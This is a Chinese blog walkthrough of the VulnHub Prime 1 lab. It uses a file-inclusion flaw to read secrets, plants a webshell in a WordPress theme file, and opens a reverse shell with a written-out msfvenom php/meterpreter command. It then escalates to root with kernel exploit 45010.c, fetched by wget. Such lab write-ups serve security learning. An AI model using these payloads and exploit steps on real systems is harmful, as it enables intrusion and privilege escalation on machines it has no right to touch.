渗透测试——prime1靶场实战演练{常用工具}端口转发

文章目录

    • 概要
    • 信息搜集

概要

靶机地址:https://www.vulnhub.com/entry/prime-1,358

信息搜集

nmap
扫网段存活ip及端口
在这里插入图片描述
找到除了网关外的ip,开放了80端口,登上去看看
在这里插入图片描述
是一个网站,直接上科技扫一扫目录

 python dirsearch.py -u http://192.168.203.152

在这里插入图片描述
扫从出来了常见的wordpress,nice。
那么就使用wpscan…

wpscan --url http://ip/wordpress/ --e u

在这里插入图片描述
扫到一个用户victor,联想到靶机开放了22ssh,那么找到密码就可以尝试进ssh。
没有别的关键信息,换几个扫描工具试试了。。。

# dirb http://192.168.203.152 -X .zip,.txt,.rar,.php

在这里插入图片描述
找到image.php,index.php,sevret.txt
再看看别的工具

# gobuster dir -u http://192.168.203.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.tar,.zip

在这里插入图片描述
一样的效果,看来就这些了
再换几个工具试试

dirsearch -u http://192.168.203.152  -e zip,php,txt,rar,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
这个速度好慢啊,而且结果不是那么明白。
换一个

feroxbuster -u http://192.168.203.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
速度比dirsearch快一点点,结果还是不理想。只扫出来wp。
接下来把搜集到的东西挨个去访问,前两个都是图片,有个secret.txt打开是提示。。
在这里插入图片描述
在这里插入图片描述
让我们查看location.txt,试试能看吗。
在这里插入图片描述

让我们使用fuzz来测试参数,那么就应该想到文件包含了,先试试fuzz

apt-get install wfuzz wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw=12 "http://192.168.203.152//index.php?FUZZ=aaaa"

隐藏掉所有响应报文字数为 12 的结果后得到了一个 file 参数:

在这里插入图片描述
利用file去包含location.txt
在这里插入图片描述
在这里插入图片描述
让我们在其他php页面使用那个参数,那么很明显就剩一个了。
在这里插入图片描述
更换参数发现没啥显示,尝试文件包含试试
在这里插入图片描述
直接包含到大动脉了,
仔细找找看看能有啥发现
在这里插入图片描述
这个是显示两个用户,一个victor,一个saket,还显示某个地方存在一个passwd文件,
试试文件包含

在这里插入图片描述
那么这个应该是victor的密码了,尝试ssh登录
在这里插入图片描述

明显没有那么简单就上去,那么就想想这个密码会是什么地方的?
“wordpress”
前面是扫出来了登录页面的
我们去试试看能登陆上吗
在这里插入图片描述
先试试victor
发现直接登录了,
找一下有没有可以写入文件的地方
找到了一处有更新按钮的php文件
在这里插入图片描述
里面还有人留下过东西,那么应该就是这了
那就上大动作
在这里插入图片描述
蚁剑上

在这里插入图片描述
这个是路径

http://192.168.203.152/wordpress/wp-content/themes/twentynineteen/secret.php

似乎有点太顺利了,

果然尝试nc,python等反弹shell方法均无效,那么就
只能想其他办法了
msfvenom 嗯
因为电脑已经开了一个win虚拟机,靶机,再开一个kali直接爆炸了,

在这里插入图片描述

于是我
直接用我昨天做的隔空kali
有兴趣去上一个作品
在这里插入图片描述
服务器开了,kali去连接就行了,接下来的数据都通过服务器处理
在这里插入图片描述

现在才觉得
顺序是多么重要。
在这里插入图片描述
刚刚在上面使用命令知道了,这个内核是有漏洞的,所以直接使用

在这里插入图片描述
看见有个45010.c
把他下载下来,


searchsploit -m exploit/linux/local/45010.c

然后上msf

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php

这个我使用的公网转发,用内网地址代替了,其实是用公网转发到另一套电脑的。
然后就把生成的shell的内容复制到secret.php,并更新他,
接着就是msf组合拳
msfconsole
在这里插入图片描述
为啥是127.0.0.1,因为做了转发 ,没明白的看下上一篇。
在这里插入图片描述
这样就打进shell了,上面我们还下载了45010.c内核漏洞提权文件
然后我们用python打开一个http服务来让另一台电脑能访问并下载我们的文件。

python -m http.server 8888

监听一下 ,在msf里面操作下载文件,

wget http://192.168.199.128/45010.c#desktop
#在哪里打开的就是根目录,直接跟上文件就行 

在这里插入图片描述
因为这个是在蚂蚁中完成的,所以图是这样的
不影响接下来的提权
在这里插入图片描述
在msf里面试试也是不行,
但是我发现靶机是有python的
所以想到了pty伪终端
利用python的pty模块创建一个伪终端,

 python -c:‌这是Python命令行工具的一个选项,‌用于执行紧跟在-c后面的Python代码。‌import pty;:‌这行代码导入了Python的pty模块,‌该模块提供了一些用于创建和管理伪终端的功能。‌pty.spawn('/bin/bash');:‌这行代码使用pty模块的spawn函数来启动一个新的bash shell。‌/bin/bash是bash shell的默认路径,‌spawn函数会创建一个新的进程,‌并在该进程中运行指定的命令(‌在这个例子中是bash shell)‌。‌python3 -c "import pty;pty.spawn('/bin/bash');"
然后给编译的450加个执行的权限

发现不能执行,找到了tmp文件夹,发现可以执行,所以直接来试试
在这里插入图片描述
ok了查看root文件夹
在这里插入图片描述
这就是密钥吧
exit退出后使用sudo -l再看看
在这里插入图片描述
发现enc可以以root方法执行
在这里插入图片描述
找了一下备份密码

find / -name '*backup*' 2>dev/nul

在这里插入图片描述
然后去执行enc
在这里插入图片描述
生成了两个文档

需要解密才行
剩下的交给以后的我,
把基础先学会了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/3266122.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

{Spring Boot 原理篇} Spring Boot自动装配原理

SpringBootApplication 1,Spring Boot 应用启动,SpringBootApplication标注的类就是启动类,它去实现配置类中的Bean的自动装配 SpringBootApplication public class SpringbootRedis01Application {public static void main(String[] args)…

GRE VPN和MGRE VPN综合练习

GRE VPN和MGRE VPN综合练习 实验拓扑 实验要求 1、R5为ISP,只能进行IP地址配置,其所有地址均配为公有IP地址; 2、R1和R5间使用PPP的PAP认证,R5为主认证方; R2与R5之间使用ppp的CHAP认证,R5为主认证方; R3与R5之间使用HDLC封装;…

【JavaScript】深入理解 `let`、`var` 和 `const`

文章目录 一、var 的声明与特点二、let 的声明与特点三、const 的声明与特点四、let、var 和 const 的对比五、实战示例六、最佳实践 在 JavaScript 中,变量声明是编程的基础,而 let、var 和 const 是三种常用的变量声明方式。本文将详细介绍这三种变量声…

做一个能和你互动玩耍的智能机器人之一

2024年被很多人称为AI元年,其实AI元年的叫法由来以久,近年来每一次AI技术的进步,都有很多圈内人大呼AI元年,但不仅一直风声不大,雨点也偏小,都是小范围交流。 得益于软硬件的进步,AI今年开始侵…

秋招突击——7/23——百度提前批面试准备和正式面试

文章目录 引言一面准备面试预演一1、讲一下hashcode()和equals()关系2、equals()和有什么区别3、讲一下重载和重写的区别4、讲一下深拷贝、浅拷贝的区别5、讲一下Java异常的基类,运行时异常举几个例子,什么情况下会出现?6、讲一下Java中线程的…

pytorch前馈神经网络--手写数字识别

前言 具体内容就是: 输入一个图像,经过神经网络后,识别为一个数字。从而实现图像的分类。 资源: https://download.csdn.net/download/fengzhongye51460/89578965 思路: 确定输入的图像:会单通道灰度的…

基于dcm4chee搭建的PACS系统讲解(三)服务端使用Rest API获取study等数据

文章目录 DICOMWeb Support模块主要数据结构ER查询信息基本信息metadata信息统计信息 实践查询API及参数解析API返回的json数组定义VRObjectNodeObjectMapper解析显示指定tag并解析 后记 前期预研的PACS系统,近期要在项目中上线了。因为PACS系统采用无权限认证&…

【初阶数据结构】8.二叉树(3)

文章目录 4.实现链式结构二叉树4.1 前中后序遍历4.1.1 遍历规则4.1.2 代码实现 4.2 结点个数以及高度等4.3 层序遍历4.4 判断是否为完全二叉树4.5层序遍历和判断是否为完全二叉树完整代码 4.实现链式结构二叉树 用链表来表示一棵二叉树,即用链来指示元素的逻辑关系…

减轻幻觉新SOTA,7B模型自迭代训练效果超越GPT-4,上海AI lab发布

LLMs在回答各种复杂问题时,有时会“胡言乱语”,产生所谓的幻觉。解决这一问题的初始步骤就是创建高质量幻觉数据集训练模型以帮助检测、缓解幻觉。 但现有的幻觉标注数据集,因为领域窄、数量少,加上制作成本高、标注人员水平不一…

php反序列化--前置知识

🎼个人主页:金灰 😎作者简介:一名简单的大一学生;易编橙终身成长社群的嘉宾.✨ 专注网络空间安全服务,期待与您的交流分享~ 感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️ 🍊易编橙终身成长社群&#…

文件共享功能无法使用提示错误代码0x80004005【笔记】

环境情况: 其他电脑可以正常访问共享端,但有一台电脑访问提示错误代码0x80004005。 处理检查: 搜索里输入“启用或关闭Windows功能”按回车键,在“启用或关闭Windows功能”里将“SMB 1.0/CIFS文件共享支持”勾选后(故…

不同行情下算法的具体使用!

上一篇我们说到了不同公司算法交易的区分,有朋友提出了不同的行情下的算法交易应该怎么使用,小编今天就带大家了解下!当然具体实际状况百出,这种可以实际为准(韭菜修养全拼实际探讨交流)! 我们在…

qt做的分页控件

介绍 qt做的分页控件 如何使用 创建 Pagination必须基于一个QWidget创建,否则会引发错误。 Pagination* pa new Pagination(QWidget*);设置总页数 Pagination需要设置一个总的页数,来初始化页码。 pa->SetTotalItem(count);设置可选的每页数量…

Java 每日一题: for 与 foreach 的区别 ?

for 循环:是最基本的循环结构,可以通过初始化语句、循环条件和迭代语句来控制循环的执行。 foreach 循环(也称为增强型 for 循环):用于遍历集合或数组中的元素,简化了遍历过程,没有显式地控制索…

[STM32]HAL库实现自己的BootLoader-BootLoader与OTA-STM32CUBEMX

目录 一、前言 二、BootLoader 三、BootLoader的实现 四、APP程序 五、效果展示 六、拓展 一、前言 听到BootLoader大家一定很熟悉,在很多常见的系统中都会存在BootLoader。本文将介绍BootLoader的含义和简易实现,建议大家学习前掌握些原理基础。 …

全链路追踪 性能监控,GO 应用可观测全面升级

作者:古琦 01 介绍 随着 Kubernetes 和容器化技术的普及,Go 语言不仅在云原生基础组件领域广泛应用,也在各类业务场景中占据了重要地位。如今,越来越多的新兴业务选择 Golang 作为首选编程语言。得益于丰富的 RPC 框架&#xff…

编程类精品GPTs

文章目录 编程类精品GPTs前言种类ChatGPT - GrimoireProfessional-coder-auto-programming 总结 编程类精品GPTs 前言 代码类的AI, 主要看以下要点: 面对含糊不清的需求是否能引导出完整的需求面对完整的需求是否能分步编写代码完成需求编写的代码是否具有可读性和可扩展性 …

力扣算法题:矩阵(玄幻不变量法),链表(虚拟头节点,递归法)

20240725 一、矩阵54.螺旋矩阵(循环不变量) 二、链表1 移除链表元素1.1 原链表删除元素:1.2 虚拟头节点(!!!) 2. 设计链表206. 反转链表(双向指针和递归)双指针递归 交换链表中的元素虚拟头节点法递归法 删…

如何解决 Nginx 与边缘计算节点的集成问题?

🍅关注博主🎗️ 带你畅游技术世界,不错过每一次成长机会! 文章目录 如何解决 Nginx 与边缘计算节点的集成问题?一、理解集成的需求和目标二、解决网络配置问题三、优化 Nginx 配置四、处理安全与认证问题五、监控与调试…

STM32是使用的内部时钟还是外部时钟

STM32是使用的内部时钟还是外部时钟,经常会有人问这个问题。 1、先了解时钟树,见下图: 2、在MDK中,使用的是HSEPLL作为SYSCLK,因此需要对时钟配置寄存器(RCC_CFGR)进行配置,寄存器内…